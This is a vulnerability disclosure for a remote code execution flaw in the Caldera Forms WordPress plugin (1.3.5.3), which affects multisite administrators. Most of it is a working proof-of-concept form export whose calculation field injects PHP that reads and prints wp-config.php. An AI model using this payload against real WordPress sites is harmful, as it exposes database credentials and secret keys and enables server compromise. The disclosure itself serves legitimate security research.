Caldera Forms [Multisite Admins Remote Code Execution]
Description
Plugin Caldera Forms - Drag and drop responsive form builder allows users to create a dynamically calculated field called calculation. This field can be manipulated in execuring arbitrary PHP code in server.
Although this field is available only to site administrators, in a multisite installation this vulnerability can be exploited by individual website administrators in order to elevate privileges or perform other malicious actions.
PoC
Import the following form and preview it, you should see the content of
the wp-config.php file.
{"_last_updated":"Thu, 26 May 2016 19:52:50 +0000","ID":"CF57475402d521e","cf_version":"1.3.5.3","name":1,"description":"","db_support":1,"pinned":0,"hide_form":1,"check_honey":1,"success":"Form has been successfully submitted. Thank you.","avatar_field":"","form_ajax":1,"custom_callback":"","layout_grid":{"fields":{"fld_4338248":"1:1","fld_1316929":"1:1","fld_6796077":"1:1","fld_5987102":"1:1","fld_3993413":"2:1","fld_5161425":"2:2","fld_8997460":"3:1","fld_1338703":"3:2"},"structure":"12|6:6|6:6"},"fields":{"fld_4338248":{"ID":"fld_4338248","type":"hidden","label":"One","slug":"one","conditions":{"type":"con_fld_4338248"},"caption":"","config":{"custom_class":"","default":10}},"fld_1316929":{"ID":"fld_1316929","type":"hidden","label":"Two Big","slug":"two_big","conditions":{"type":"con_fld_1316929"},"caption":"","config":{"custom_class":"","default":5}},"fld_6796077":{"ID":"fld_6796077","type":"hidden","label":"Two Small","slug":"two_small","conditions":{"type":"con_fld_6796077"},"caption":"","config":{"custom_class":"","default":1}},"fld_5987102":{"ID":"fld_5987102","type":"hidden","label":"Base","slug":"base","conditions":{"type":""},"caption":"","config":{"custom_class":"","default":25}},"fld_3993413":{"ID":"fld_3993413","type":"checkbox","label":"Want Option 1?","slug":"option_1","conditions":{"type":""},"caption":"","config":{"custom_class":"","inline":1,"auto_type":"","taxonomy":"category","post_type":"post","value_field":"name","orderby_tax":"name","orderby_post":"name","order":"ASC","default":"","option":{"opt1697235":{"value":"Yes","label":"Yes"}}}},"fld_5161425":{"ID":"fld_5161425","type":"dropdown","label":"Option 2 Type","slug":"option_2","conditions":{"type":""},"caption":"","config":{"custom_class":"","placeholder":"","auto_type":"","taxonomy":"category","post_type":"post","value_field":"name","orderby_tax":"name","orderby_post":"name","order":"ASC","default":"","option":{"opt1533135":{"value":"Big","label":"Big"},"opt1786217":{"value":"Small","label":"Small"}}}},"fld_8997460":{"ID":"fld_8997460","type":"calculation","label":"Total","slug":"total","conditions":{"type":""},"caption":"","config":{"custom_class":"","element":"h3","classes":"total-line","before":"Total:","after":"","fixed":1,"thousand_separator":",","manual":1,"formular":" ( fld_5987102+fld_4338248+fld_6796077+fld_1316929 ) ","config":{"group":[{"lines":[{"operator":"+","field":"fld_5987102"},{"operator":"+","field":"fld_4338248"},{"operator":"+","field":"fld_6796077"},{"operator":"+","field":"fld_1316929"}]}]},"manual_formula":"print_r(esc_html(file_get_contents(ABSPATH.'\/wp-config.php'))) && die;\n"}},"fld_1338703":{"ID":"fld_1338703","type":"button","label":"Pay","slug":"pay","conditions":{"type":""},"caption":"","config":{"custom_class":"","type":"submit","class":"btn btn-default","target":""}}},"page_names":["Page 1"],"conditional_groups":{"conditions":{"con_fld_1316929":{"id":"con_fld_1316929","name":"Two Big","type":"hide","fields":{"cl3564295763":"fld_5161425"},"group":{"rw19946608611":{"cl3564295763":{"parent":"rw19946608611","field":"fld_5161425","compare":"isnot","value":"opt1533135"}}}},"con_fld_4338248":{"id":"con_fld_4338248","name":"One","type":"hide","fields":{"cl5675243200":"fld_3993413"},"group":{"rw47185924125":{"cl5675243200":{"parent":"rw47185924125","field":"fld_3993413","compare":"isnot","value":"opt1697235"}}}},"con_fld_6796077":{"id":"con_fld_6796077","name":"Two Small","type":"hide","fields":{"cl7168988428":"fld_5161425"},"group":{"rw74415141932":{"cl7168988428":{"parent":"rw74415141932","field":"fld_5161425","compare":"isnot","value":"opt1786217"}}}}}},"settings":{"responsive":{"break_point":"sm"}},"mailer":{"on_insert":1,"sender_name":"Caldera Forms Notification","sender_email":"[email protected]","reply_to":"","email_type":"html","recipients":"","bcc_to":"","email_subject":1,"email_message":"{summary}"},"version":"1.3.5.3"}
INFO
- 26 May 2016
- Pan Vag
- calderawp.com
- Caldera Forms
- 1.3.5.3
- WordPress 4.5.2
- DWF-2016-87049